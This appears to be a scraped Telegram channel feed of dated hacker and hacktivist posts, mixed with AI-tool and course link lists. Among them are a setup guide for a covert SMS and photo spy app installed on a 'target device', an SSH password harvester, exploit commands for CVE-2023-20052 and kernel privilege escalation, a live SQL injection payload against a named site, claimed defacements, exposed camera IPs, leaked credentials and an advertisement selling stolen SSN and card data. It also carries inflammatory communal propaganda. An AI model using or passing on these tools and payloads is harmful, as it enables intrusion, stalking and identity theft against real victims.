Best ChatGPT Alternatives to finish hours of work in seconds 𝗙𝗼𝗿 𝗪𝗿𝗶𝘁𝗶𝗻𝗴 ChatSonic - https://writesonic.com/chat ChatABC - https://chatabc.ai JasperAI - https://www.jasper.ai Quillbot - https://quillbot.com 𝗙𝗼𝗿 𝗖𝗼𝗱𝗶𝗻𝗴 Copilot- https://github.com/features/copilot Tabnine - https://www.tabnine.com MutableAI - https://mutable.ai Safurai - https://www.safurai.com 10Web - https://10web.io/ai-website-builder 𝗙𝗼𝗿 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵 Paperpal - https://paperpal.com Perplexity - https://www.perplexity.ai YouChat - https://you.com/search?q=who+are+you&tbm=youchat&cfr=chat Elicit - https://elicit.org 𝗙𝗼𝗿 𝗧𝘄𝗶𝘁𝘁𝗲𝗿 Tweetmonk - https://tweetmonk.com Tribescaler - https://tribescaler.com Postwise - https://postwise.ai TweetLify - https://www.tweetlify.co 𝗙𝗼𝗿 𝗣𝗿𝗼𝗱𝘂𝗰𝘁𝗶𝘃𝗶𝘁𝘆 Synthesia - https://www.synthesia.io Otter - https://otter.ai Bardeen - https://www.bardeen.ai CopyAI - https://www.copy.ai/?via=start 𝗙𝗼𝗿 𝗖𝗼𝗻𝘁𝗲𝗻𝘁 𝗖𝗿𝗲𝗮𝘁𝗶𝗼𝗻 WriteSonic - https://writesonic.com/chat Tome - https://beta.tome.app CopySmith - https://app.copysmith.ai TextBlaze - https://blaze.today 𝗥𝗲𝘀𝘂𝗺𝗲 𝗕𝘂𝗶𝗹𝗱𝗲𝗿𝘀 KickResume - https://www.kickresume.com ReziAI - https://www.rezi.ai ResumeAI - https://www.resumai.com EnhanceCV - https://enhancv.com 𝗙𝗼𝗿 𝗣𝗿𝗲𝘀𝗲𝗻𝘁𝗮𝘁𝗶𝗼𝗻𝘀 BeautifulAI - https://www.beautiful.ai Simplified - https://simplified.com Slidesgo - https://slidesgo.com Sendsteps - https://www.sendsteps.com/en 𝗙𝗼𝗿 𝗔𝘂𝗱𝗶𝗼 MurfAI - https://murf.ai Speechify - https://speechify.com LovoAI- https://lovo.ai MediaAI- https://www.ai-media.tv
2023-05-24 15:09:02
https://system32.ink/uncover-the-secrets-of-any-target-with-postman/
2023-05-24 05:40:15
https://system32.ink/chromeos-users-beware-mount-passthrough-jailed-vulnerability-could-leave-you-exposed/
2023-05-24 04:55:50
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS. 𝙇𝙞𝙣𝙠: https://youtube.com/shorts/AA_Xlm6-Pr4?feature=share✨🙌
2023-05-24 04:46:20
𝗬𝗢𝗨𝗧𝗨𝗕𝗘 𝗪𝗔𝗧𝗖𝗛𝗧𝗜𝗠𝗘 𝗠𝗘𝗧𝗛𝗢𝗗✍NOTE :-  WITHOUT PC NO NEED RDP 1.FIRST DOWNLOAD LAMUR BROWSERLink :- https://play.google.com/store/apps/details?id=com.lemurbrowser.exts2. ADD WINDSCRIPT EXTENSION AND MAKE NEW ACCOUNT3. GO TO LAMUR BROWSE AND OPEN MULTIWINDOW TAB OPEN 1-1000 TAB4. ALL TAP CONNECT  ANOTHER SERVER5. PLAY YOUTUBE VIDEO LINK ALL TAPS
2023-05-23 05:39:18
🪩Gallery & SMS Spy App🪩✅Telegram based Android App✅ Send photos/SMS to TG Bot✅ Fully undetetable ( GalleryEye)🟢 Same Setup for SmsEye▫️ SmsEye Spy App not FUD
2023-05-23 05:39:04
Unveiling the Gallery & SMS Spy App: Setup and Installation GuideIntroduction:In the world of technology, privacy and security are of paramount importance. For various reasons, individuals may find themselves needing to monitor and protect their personal data, particularly their photo gallery and SMS communications. The Gallery & SMS Spy App, an Android application accessible through Telegram, offers a comprehensive solution for monitoring and safeguarding these aspects of your digital life. This guide will walk you through the setup and installation process, ensuring a seamless experience with the app.App Overview:The Gallery & SMS Spy App leverages the capabilities of Telegram to provide a powerful and discreet method of monitoring your photo gallery and SMS messages. Key features of this app include:1. Telegram Integration: The app operates within the Telegram messaging platform, making it easily accessible and convenient for users.2. Photo and SMS Transfer: Users can send photos and SMS messages directly to the Telegram bot associated with the app, allowing for monitoring and storage of this data.3. Undetectability (GalleryEye): The GalleryEye module of the app is designed to operate discreetly, ensuring that your photo gallery remains hidden and secure.4. SmsEye Functionality: The SmsEye module provides the ability to monitor SMS messages, although it is worth noting that it may not be fully undetectable.Setup and Installation:Follow these steps to set up and install the Gallery & SMS Spy App:1. Telegram Account: If you don't already have one, create an account on Telegram (available on Android and iOS) and log in.2. Download App Files: Visit the provided link or source for the Gallery & SMS Spy App (please exercise caution when obtaining apps from unofficial sources).3. Bot Creation: In Telegram, search for "BotFather" and create a new bot by following the provided instructions. Note down the generated bot token.4. App Configuration: Open the app files you downloaded and locate the configuration file. Edit it using a text editor and enter your bot token in the designated field.5. App Installation: Install the modified app file on the target Android device. Ensure that the device allows installations from unknown sources by enabling the "Unknown Sources" option in the device settings.6. Launch the App: Open the installed app on the target device. Follow any on-screen prompts or instructions to complete the setup process.7. Linking with the Bot: Once the app is launched, link it to the Telegram bot you created by providing the necessary credentials.8. Sending Photos and SMS: You can now begin using the app by sending photos and SMS messages to the associated Telegram bot. This will allow you to monitor and store this data securely.Note of Caution:It is crucial to respect the privacy and legal considerations of individuals when using such apps. Ensure that you have proper authorization to monitor or access someone's photo gallery or SMS messages. Misuse or unethical use of this app may infringe upon privacy rights and potentially violate local laws.Conclusion:The Gallery & SMS Spy App offers a convenient and discreet means of monitoring and protecting your photo gallery and SMS communications. By following the setup and installation process outlined in this guide, you can leverage the app's features to enhance your privacy and security. Remember to use this app responsibly, respecting the privacy and legal boundaries of others. Safeguard your digital life effectively and ethically with the Gallery & SMS Spy App.
2023-05-22 05:41:59
𝙓𝙎𝙎 𝘼𝙪𝙩𝙤𝙢𝙖𝙩𝙞𝙤𝙣 😍✨XSS automation offers efficient and accurate detection of cross-site scripting vulnerabilities, saving time and resources compared to manual testing methods.𝙇𝙞𝙣𝙠: https://youtu.be/I5NTW8GTKvEPlease Share your Views ☺️🙌
2023-05-21 14:19:16
SSH Harvester | We get ssh passwords of users in plain text.Well, yes, yes, yes, a couple of years ago there was an article that, during authorization, the ssh server spawns 2 processes, on one of which the pass rolls in the clear, in fact, at this moment it is pulled out.In general, they put the script, fishing goes by itself
2023-05-20 16:12:08
https://youtu.be/gQ_gmgjEbJ0https://youtu.be/gQ_gmgjEbJ0Learn DOM XSS Vulnerability easily😊
2023-05-20 14:17:01
https://portal.lics.pkhttps://aquastar.com.pk/http://pjn.com.pk/https://electro.aquastar.com.pk/https://ha.aquastar.com.pk/http://alkifl.com/http://overseasestate.pk/http://amazingquranacademy.com/http://mail.amazingquranacademy.comhttp://mail.overseasestate.pk/http://mail.alkifl.com/#IndianCyberMafia #KeralaCyberXtractors #IndianCyberForce #NewWorldHacktivist #IndianDarknetAssociation#TEAMONEfourONE#UnknownCyberCult#AnonymousIndia#INDIANHACKERS
2023-05-20 04:50:33
🔥 Bad Spin : Android Binder LPEPrivilege escalation exploit from unstrusted_app for Android Binder vulnerability (CVE-2022-20421).Run from shell:1️⃣Compile the libbadspin.so library by typing make push in the src/ directory. This will also push the library to /data/local/tmp.2️⃣Run adb shell.3️⃣Run LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1. This will load the library and start the exploit.Run from demo app:1️⃣Compile libbadspin.so by typing make push in the src/ directory. This will copy the library to the assets directory for the demo Android app.2️⃣Compile the demo Android app in the app/ directory. (You might need Android Studio to do this.)3️⃣Run the app and click on the "Exploit" button.4️⃣Consume logs using: adb logcat -s BADSPINDownload
2023-05-20 04:46:49
CoercerA python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
2023-05-19 17:10:02
Join for Premium Courses for FREE @nocostcourses
2023-05-19 15:11:48
CVE-2023-21554 Windows MessageQueuing PoCDownload
2023-05-19 13:35:15
Scada system of Chemical factory of porkis has been compromised by Team 1-4-1 🇮🇳
2023-05-19 12:10:15
Team insane right now😂
2023-05-19 03:11:09
None
2023-05-18 10:52:49
Windows UAC Bypass ScriptDownload
2023-05-18 08:08:44
None
2023-05-18 08:08:16
OEBuilder | Hack Using Excel And DocOEBuilder uunique assembly, crypter and macro generator for stitching your bootloader into the doc file. The software is very convenient and understandable.Features:*Fake Error*UAC Bypass*Add password to doc*add text*USG*DOC*XLS*Silent add ons
2023-05-18 04:38:20
https://statetimes.in/hackers-attack-ahmedabad-hospital-with-ransomware-demand-usd-70000-to-restore-data/
2023-05-17 18:08:55
gg's hacker's ( I love you —❤️ ‼️Here we go again here we go again 🎉#OSINT1₾ Visual Ping web page monitoring service, helps to track of changes on any particular website. ( hourly/everyday )2₾ All the internet combines results from different search engines and social media.3₾ izito searches and combines all Search Engines! Yahoo, Microsoft Bing, YouTube, Wikipedia, Entireweb etc...#exploit1. CVE-2023-1586:Avast Anti-Virus privileged arbitrary file create on virus restore and as always #hacker_bano_chutiya_nhe 😍😍
2023-05-17 16:02:38
CVE-2023-32243 | wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationusage: exploit.py [-h] -u URL -p PASSWORD [-usr USERNAME] Download Exploit
2023-05-17 13:49:00
username ims0rry password racoon
2023-05-17 12:37:05
web2shellA Python program used to automate converting webshells into reverse shells. If you regularly do CTF, HTB, or red teaming you've probably spent a good chunk of time testing payloads to convert a webshell into a reverse shell. This tool aims to simplify this process.
2023-05-17 04:52:36
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS𝙇𝙞𝙣𝙠: https://youtube.com/shorts/Mw9tXoozrKo?feature=share
2023-05-17 03:47:31
None
2023-05-16 19:55:40
Best Online MD5 Encryption & Decryption Toolshttps://trickypenguin.ink/best-online-md5-encryption-decryption-tools/@trickypenguin #pentesting #cryptography
2023-05-16 17:31:37
g's hacker's ( its a bad day for me but —❤️ ‼️Here we go again Microsoft is scanning the inside of password-protected zip files for malware read_more#hacker_bano_chutiya_nhe 😤
2023-05-16 16:52:05
XSS where you can inject the payload within the image file name and alert!.𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
2023-05-16 16:31:33
How to save all post in private from public channel Using bot Post credit @its_me_dollar@Deadlymalwarexpbot
2023-05-16 11:50:22
💥 PoC for CVE-2023-32233(tested under Ubuntu 23.04)Once the PoC is started on a vulnerable system, it may leave that system in an unstable state with corrupted kernel memory. We strongly recommend to test the PoC on a dedicated system to avoid potential data corruptions.Download: https://system32.ink/news-feed/p/367/
2023-05-16 11:37:27
https://www.csoonline.com/article/3696313/hackers-exploit-wordpress-vulnerability-within-hours-of-poc-exploit-release.html
2023-05-16 06:42:55
🔥NETGEAR Routers: A Playground for Hackers?Overall, the security posture of custom binaries built by NETGEAR contained many vulnerabilities, largely due to the widespread usage of insecure C functions such as strcpy, strcat, sprintf, or from off-by-one errors. However, the majority of the binaries on the NETGEAR router were compiled with many protections in place, including stack canaries, non-executable stack (NX), position-independent code (PIE) and address layout randomization (ASLR) enabled. These protections made many of the vulnerabilities identified difficult to exploit on their own.Content:💾 Summary💾 Advisories💾 Vulnerabilities 💽 Telnet 📀 PSV-2023-0008 – Telnet Default Account Privilege Escalation Breakout 💽 Web Application 📀 PSV-2022-???? – JSON Response Stack Data Leak 💽 SOAP Service 📀 PSV-2023-0009 – Write HTTP Response Stack Pointer Leak 📀 PSV-2022-???? – SOAPAction Stack Buffer Overflow 📀 PSV-2023-0010 – HTTP Body Off-By-One NULL Terminator Stack Canary Corruption 📀 PSV-2023-0011 – HTTP Protocol Stack Buffer Overflow 📀 PSV-2023-0012 – SOAP Parameters Stack Buffer Overflow💾 Conclusion
2023-05-16 05:33:08
XSS where you can inject the payload within the image file name and alert!.𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
2023-05-16 00:11:18
None
2023-05-15 05:21:26
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: DOM based XSSLink: https://youtu.be/gQ_gmgjEbJ0Please Share your Views 🙏🏻☺️ & Subscribe to our YouTube channel for more Videos. Really Thank you for your Support😊🙌
2023-05-15 02:07:07
MagSpoofA portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. It can disable Chip&PIN and predict AMEX card numbers with 100% accuracy.
2023-05-14 15:48:53
10+ PK government websites h*-cked.A perfect payback to pk from #indiancybertroopshttps://cmdu.gob(.pk)/https://forensic.sindhpolice.gov (.pk)/index.php https://mppbeta.sindhpolice.gov (.pk)/https://legal.sindhpolice.gov (.pk)/https://demo.cmdu.gob (.pk)/https://pphi.cmdu.gob (.pk)/ https://ekacheri.cmdu.gob (.pk)/https://hubportal.cmdu.gob (.pk)/ https://rds.cmdu.gob (.pk)/https://test.cmdu.gob (.pk)/ https://expl.kp.gov (.pk)/
2023-05-14 12:57:08
https://youtu.be/uUmMc05iFuo
2023-05-14 12:53:26
​​Kovid RootkitA full-feature LKM intended for use against Linux kernel v5+.https://github.com/carloslack/KoviD#infosec #pentesting #redteam
2023-05-14 12:52:20
​​badsecretsA library for detecting known secrets across many web frameworks.https://github.com/blacklanternsecurity/badsecretsDetails:https://blog.blacklanternsecurity.com/p/introducing-badsecrets#cybersecurity #infosec #pentesting
2023-05-14 11:14:52
None
2023-05-14 06:07:11
Jai Shree Ram 🔥
2023-05-14 05:40:53
Happy Mother's Day.
2023-05-14 05:39:28
❗️🇵🇰 After 51 yrs PTI Chairman & Ex-PM of Pakistan Imran Khan admits the truth of East Pak (now Bangladesh) & blames Pak Army by saying Mujibur Rahman after winning the election should have been the PM but Pak Army did crackdown instead & end up losing with 90K POWs & humiliation
2023-05-14 01:36:27
Om hari hari, jai shree ram 🙏
2023-05-13 15:38:15
SITE URL - https://www.comand.edu.pk/PAYLOAD - id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9657=9657-- kGMXKHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO 😂😂HACKED BY -CYBER DEMONS INDIA 🇮🇳JAY SHREE RAAM 🤒🙏🇮🇳❤️❤️
2023-05-13 14:29:29
wpfinger | WordPress scanning tool.• Core version detection• Plugin scanning through fingerprinting• Vulnerability output, using database from Wordfence
2023-05-12 01:37:51
None
2023-05-11 15:18:44
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠 : https://youtube.com/watch?v=uUmMc05iFuo&feature=sharePlease Share your views&𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻𝙏𝙝𝙖𝙣𝙠𝙨 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙎𝙪𝙥𝙥𝙤𝙧𝙩. ☺️
2023-05-11 12:20:01
BIG ⚡️⚡️ Leaked Recording 🚨 Another Hassan Siddiqui from Pak Armed Forces exposed themselves !!
2023-05-11 00:31:39
None
2023-05-10 14:04:17
CHIT CHAT ON SOC 👽 WITH @abhinavkakku ( SOC ANALYST) BHAIYA AT @cyberdemonsindiaaTIME - 8:00 PM TODAY ( AFTER HALF AN HOUR ) #hacker_bano_chutiya_nahi 👌
2023-05-10 13:06:39
💥CVE-2023-20052 exploitTo create malicious DMG file:$ git clone https://github.com/XXXXXXXX/CVE-2023-XXXX.git$ cd CVE-2023-20052$ sudo docker build -t cve-2023-20052 .$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmgTo trigger exploit:$ clamscan --debug exploit.dmg
2023-05-10 08:29:37
A large number of protestors from Khyber Pakhtunkhwa have reached near the Police lines H-11 in Islamabad, carrying guns and sticks.Videos haven't coming out yet due to media and internet blackout.
2023-05-10 08:23:12
Pakistan under Martial Law.Today at Multiple locations Pakistan Army opened fire on PTI protestors and killed many civilians in Pakistan.
2023-05-10 08:10:00
Report on Situation in PakistanAll characters mentioned above in video are fictional...
2023-05-10 04:58:11
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Host Header Injection𝙇𝙞𝙣𝙠: https://youtube.com/shorts/bqx9HShT0oo?feature=share𝙋𝙡𝙚𝙖𝙨𝙚 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏☺️
2023-05-10 01:18:42
MeliziaC2DNS over HTTPS targeted malware (only runs once)• Auto-delete malware on failure• Fully encrypted (per victim RSA key) DoH (DNS-over-HTTPS) communication• Malware only runs once!
2023-05-10 01:13:04
SpiderSuiteAn advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis
2023-05-10 00:20:42
❓WHAT DO WE HAVE IN PRIVATE❓❓ PRIVATE SECTOR DATABASE ❓It contains 133475 Filesking of Databaseprivate Sector all post =187837Today all(Date:09/05/2023)Unlimited data uploadingEvery day 😊😘😍Photos and videos 21023Photos 19254Videos 1769Files 133475Links 39345💻DATABASES 710+TB OVER DATABASE -bank data (90GB+) -Russian Major cities (Moscow, St. Petersburg, Rostov, ETC) -Ukraine (Gov, Residents, Major Cities, ETC)MORE DATA AVAILABLE ETC,ETC •SOCIAL MEDIAS: -VK -TELEGRAM -TWITTER -FACEBOOK -ETC -PASSPORTS -Snapchat - more social media database uploaded Government data -930 post pan Card adhar card - 1630 web site with Data post SSN 150+ BIG FILE UPLOADED MILLION OF DATABASE SSN -💀LOGS💀 (❗️5594 fils SEPERATE ARCHIVES, EACH WEIGHT TENS OF GIGABYTES❗️)NUMBER|DATE|CVC|BANK|FULL NAME|ADDRESS|COUNTRY|INDEX|PHONE NUMBER|MAIL|DOB|SSN|MMN💵PRICE💵ONE WEEK 24$ (40% DISCOUNT always )Old price 40$CONTACT: @Algorithm2botREPLY WITH BOT MASSAGEMaxx escrow accepted
2023-05-09 16:10:59
https://www.gokuldhammahatirth.org/
2023-05-09 13:03:58
🔥Linux kernel io_uring out-of-bounds access to physical memory( commit 776617d " io_uring/rsrc: check for nonconsecutive pages" )A bug in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) allows OOB access to physical memory beyond the end of the buffer. This can be used to achieve full LPE.Bug reproduction steps(PoC exploit attached):1️⃣ Create a memfd2️⃣ fallocate a single page in that file descriptor3️⃣ Use MAP_FIXED to map this page repeatedly, in consecutive locations4️⃣ Register the entire region that you just filled up with that page as a fixed buffer with IORING_REGISTER_BUFFERS5️⃣ Use IORING_OP_WRITE_FIXED to write the buffer to some other file (OOB read) or IORING_OP_READ_FIXED to read data into the buffer (OOB write).compile exploit:💾normal:gcc -Wall -Wextra -std=gnu17 -Os -s exploit.c -luring -o exploit💾static:gcc -Wall -Wextra -std=gnu17 -static -Os -s exploit.c liburing.a -o exploitDownload Exploit: https://system32.ink/news-feed/p/349/
2023-05-09 13:00:34
𝙃𝙚𝙖𝙙𝙚𝙧 𝙗𝙖𝙨𝙚𝙙 𝙎𝙌𝙇 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝘿𝙚𝙩𝙚𝙘𝙩𝙞𝙤𝙣 𝙏𝙤𝙤𝙡𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠: https://youtube.com/@cybertix 𝙇𝙞𝙣𝙠:https://github.com/SAPT01/HBSQLI
2023-05-09 07:51:44
Join our group for Exclusive Cyber Security contentt.me/ethicalhackingtechofide
2023-05-09 05:56:32
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 𝙋𝙖𝙮𝙡𝙤𝙖𝙙𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1655813481256587264?t=24T7_jpbNkPKlw-qHH_FvA&s=19
2023-05-08 13:56:55
🔥CVE-2021-38001: A Brief Introduction to V8 Inline Cache and Exploitating Type Confusion + BlogCVE-2021-38001 as a type confusion bug(issue happened in V8’s inline cache and can result in RCE) requires some basic knowledge on what an inline cache is, and how it works in v8.Download: https://system32.ink/news-feed/p/347/
2023-05-08 05:42:00
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSSCourse Link: https://youtu.be/uUmMc05iFuoPlease Share your views &𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻𝙏𝙝𝙖𝙣𝙠𝙨 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙎𝙪𝙥𝙥𝙤𝙧𝙩. ☺️
2023-05-08 05:40:52
Congress's Telangana manifesto that every Karnataka voter must listen to.▪️All government contracts to Muslim youths.▪️20 lakh financial aid to poor Muslim students.▪️Residential schools for Muslims only.▪️Hospitals for minorities only.▪️Free electricity supply to Masjid and Churches.
2023-05-07 01:30:16
Offensive Web Testing FrameworkOWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST...
2023-05-06 14:11:15
SQLI [SQL INJECTION] ATTACK TUTORIAL (USED IN DB BREACHING)Forum post (dorks) :- HereBy @Devil_AnonO.s :- LinuxTool used :- JSQLWhat is SQLI (SQL INJECTION) ❓SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.Share➡️and support✅@cyberhellcommunity
2023-05-06 13:30:54
phpMyAdmin ExploitExploit Title : phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)Affected Versions : phpMyAdmin versions of the 5.1 branch prior to 5.1.2 are affected.
2023-05-06 09:23:08
https://system32.ink/system32-byte-10/
2023-05-06 08:45:50
Chad Jaishankar 🔥
2023-05-06 06:59:27
Explore the FREE SQL resources that jump-started my career and can boost yours too!A lot of people have asked me about the best places to learn SQL, so I've put together a list of free tools that helped me a lot.I really like having a step-by-step plan for learning, and these resources make it easy and fun to keep going.𝗙𝗼𝗿 𝗳𝗿𝗲𝗲 𝗿𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀:🔸 freecodecamp.org: https://lnkd.in/duCfNtTW🔸 Programming with Mosh: https://lnkd.in/dFT8UQ4x🔸 techTFQ: https://lnkd.in/d_aSwXpJ🔸 Alex the Analyst: https://lnkd.in/dCXcY82Z𝗔𝗱𝗱𝗶𝘁𝗶𝗼𝗻𝗮𝗹 𝗳𝗿𝗲𝗲 𝗿𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀:🔸 SQLBolt: http://sqlbolt.com🔸 SQLZoo: https://lnkd.in/dCa9Vwgv🔸 SQLTest: http://sqltest.net🔸 W3Schools.com: http://w3schools.com/sql/🔸 Codecademy: https://lnkd.in/d2J3956R𝗧𝗼 𝗽𝗿𝗮𝗰𝘁𝗶𝗰𝗲:🔸 LeetCode: https://leetcode.com🔸 HackerRank: https://www.hackerrank.com🔸 DataLemur: https://datalemur.com𝗙𝗼𝗿 𝗳𝘂𝗻 𝗴𝗮𝗺𝗲𝘀 𝗼𝗻 𝗦𝗤𝗟:🔸 SQLZOO: https://sqlzoo.net/🔸 SQLBOLT: https://sqlbolt.com/🔸 SQL Murder Mystery: https://lnkd.in/dbw9JUY5I hope these resources help you learn and master SQL in a fun and engaging way. Good luck on your journey!🌟 Enjoying my content? Stay in the loop! 🌟---------
2023-05-06 03:23:11
BHEH's XSSRocketXSS Rocket is written by Black Hat Ethical Hacking with the help of #ChatGPT as experimentation, with a lot of hours spent modifying the code generated by ChatGPT, and is designed for Offensive Security and XSS (Cross-Site Scripting) attacks.
2023-05-05 19:48:22
https://aacle.notion.site/Malicious-File-Upload-Checklist-3cd2b85ff7494efdac47d646b98cdce4
2023-05-05 14:29:17
XXE Attack Host: I*****TTime : 8Pm TodayAT @cyberdemonsindiaa
2023-05-05 04:32:14
None
2023-05-05 03:54:43
bangladesh religious education.. that's how a terrorist born.. don't ask for reasons.. or people/religious stuff will be exposed badly 🥺
2023-05-05 00:59:58
​​Hash MuncherGrab NetNTLMv2 hashes using ETW with administrative rights on Windows.
2023-05-04 22:04:08
Join our group for Exclusive Cyber security contentt.me/ethicalhackingtechofide
2023-05-04 20:37:33
Free API Course (Premium Quality) !Save 1000s of dollars.Seize this incredible opportunity!Bookmark this page and dive into my curated curriculum.Eager to learn API?Discover an all-inclusive API courses tailored just for you - at no cost!13 free lessons to get you interview-ready and move ahead of 90% of people.Immerse yourself in top-notch tutorials for designing, developing and testing APIs – all meticulously crafted to turbocharge your skillset!🙏 Help me spread these free courses: like, share and comment!Follow these steps in the specified order to ensure success: 1. API and REST API Fundamentals - https://lnkd.in/e8eMet_k 2. API Methods - https://lnkd.in/ey9v7-hU 3. API Terminologies - https://lnkd.in/eRsPMzpd 4. API Authentication - https://lnkd.in/eNPfpAdE 5. API Status Codes - https://lnkd.in/egXizUrS 6. REST API vs GraphQL - https://lnkd.in/eZHREdgC 7. API Integration - https://lnkd.in/eDASPP5m 8. API Testing - https://lnkd.in/emgmWJqH 9. API with Python - https://lnkd.in/eM23ah2y 10. API Scaling - https://lnkd.in/e3mZSvmn 11. Designing and Developing Robust APIs - https://lnkd.in/eBXzbFyg 12. Designing APIs with Postman- https://lnkd.in/ezue3d4B 13. Testing APIs with Postman - https://lnkd.in/eCPnGTGiReady to take your APIs skills to the next level?Try these free Premium quality courses to see immediate results.
2023-05-04 20:19:41
FREE Cybersecurity Courses! Save 1000s of dollars. You asked, and I listened! 📣 Presenting a list of FREE cybersecurity courses just for you! 💻 Seize this incredible opportunity! Bookmark this page and dive into my curated curriculum. Eager to learn Cybersecurity? Discover an all-inclusive Cybersecurity courses tailored just for you - at no cost! 29 free lessons to get you interview-ready and move ahead of 90% of people. Immerse yourself in top-notch tutorials and certifications – all meticulously crafted to turbocharge your skillset! 🙏 Help me spread these free courses: like, share and comment! 🔐1. Intro to Information Security by Udacity: https://lnkd.in/ggdYxnUp 🔐2. Network Security by Udacity: https://lnkd.in/gSHx2tJQ 🔐3. Introduction to Cybersecurity: https://lnkd.in/ghQY8cKA 🔐4. Cybersecurity Essentials: https://lnkd.in/gZe6bf-t 🔐5. Networking Essentials: https://lnkd.in/gjipDpgG 🔐6. NSE 1,2 & 3: https://lnkd.in/gsQJhn2a 🔐7. Information Security by OpenLearn: https://lnkd.in/gvfghKNs 🔐8. Network Security by OpenLearn: https://lnkd.in/gS2KWNfN 🔐9. Risk Management by Open Learn: https://lnkd.in/gGPTDU2g 🔐10. Certified in Cybersecurity℠ - CC: https://lnkd.in/gW3w8Jqu 🔐11. CCNA Security Courses: https://lnkd.in/gfby3CR2 🔐12. Network Defense Essentials (NDE): https://lnkd.in/g6mRKt2t 🔐13. Ethical Hacking Essentials (EHE): https://lnkd.in/gRBGCud7 🔐14. Digital Forensics Essentials (DFE): https://lnkd.in/gPrkYcDH 🔐15. Dark Web, Anonymity, and Cryptocurrency: https://lnkd.in/gUrCCGdf 🔐16. Digital Forensics by Open Learn: https://lnkd.in/gdv8emgt 🔐17. AWS Cloud Certifications (Cybersecurity): https://lnkd.in/gaDGWdkm 🔐18. Microsoft Learn for Azure: https://lnkd.in/gDpkXiik 🔐19. Google Cloud Training: https://lnkd.in/get8rnkh 🔐20. Android Bug Bounty Hunting: Hunt Like a Rat: https://lnkd.in/gMNT8saN 🔐21. Vulnerability Management: https://lnkd.in/gvNKJnni 🔐22. Software Security: https://lnkd.in/gG4P5bkn 🔐23. Developing Secure Software: https://lnkd.in/gQRwTzKU 🔐24. PortSwigger Web Hacking: https://lnkd.in/eEa-fNfu 🔐25. RedTeaming: https://lnkd.in/et_T2DEa 🔐26. Splunk: https://lnkd.in/et5bkjeY 🔐27. Secure Software Development: https://lnkd.in/ebGpA4wG 🔐28. Maryland Software Security: https://lnkd.in/e3z4zFmJ 🔐29. Stanford Cyber Resiliency: https://lnkd.in/eg9BM5Bv 🌟 Enjoying my content? Stay in the loop! 🌟
2023-05-04 18:46:36
Israel camera 🖕http://176.12.134.50:80http://77.137.176.190:80http://147.234.51.33:80http://176.12.132.27:80
2023-05-04 18:46:35
discount 😉
2023-05-04 17:23:43
🇪🇸Laravel Scanner 🇪🇸-={SHELL, SMTP, AWS, TWILIO, SSH, NEXMO, PERFECTMONEY, DB,ENV}=- 🇨🇳💰Price :150$💎VIPMember : 100$For buy : @Hajit00n
2023-05-04 07:51:11
